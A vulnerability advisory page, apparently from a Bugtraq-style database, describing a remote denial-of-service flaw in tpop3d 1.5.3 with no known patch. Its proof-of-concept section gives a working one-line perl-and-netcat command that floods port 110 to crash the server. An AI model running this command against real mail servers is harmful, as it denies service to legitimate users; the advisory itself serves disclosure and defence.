tpop3d Remote Denial of Service Vulnerability
BID:39838
Info
tpop3d Remote Denial of Service Vulnerability
| Bugtraq ID: | 39838 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 26 2010 12:00AM |
| Updated: | Mar 26 2010 12:00AM |
| Credit: | OrderZero |
| Vulnerable: |
Chris Lightfoot tpop3d 1.5.3 |
| Not Vulnerable: | |
Discussion
tpop3d Remote Denial of Service Vulnerability
tpop3d is prone to a remote denial-of-service vulnerability because it fails to handle exceptional user-supplied input.
Successfully exploiting this issue will allow remote attackers to crash the affected application, denying service to legitimate users.
tpop3d 1.5.3 is vulnerable.
tpop3d is prone to a remote denial-of-service vulnerability because it fails to handle exceptional user-supplied input.
Successfully exploiting this issue will allow remote attackers to crash the affected application, denying service to legitimate users.
tpop3d 1.5.3 is vulnerable.
Exploit / POC
tpop3d Remote Denial of Service Vulnerability
The following example is available:
perl -e 'printf "a"x999999' | nc target 110
The following example is available:
perl -e 'printf "a"x999999' | nc target 110
Solution / Fix
tpop3d Remote Denial of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].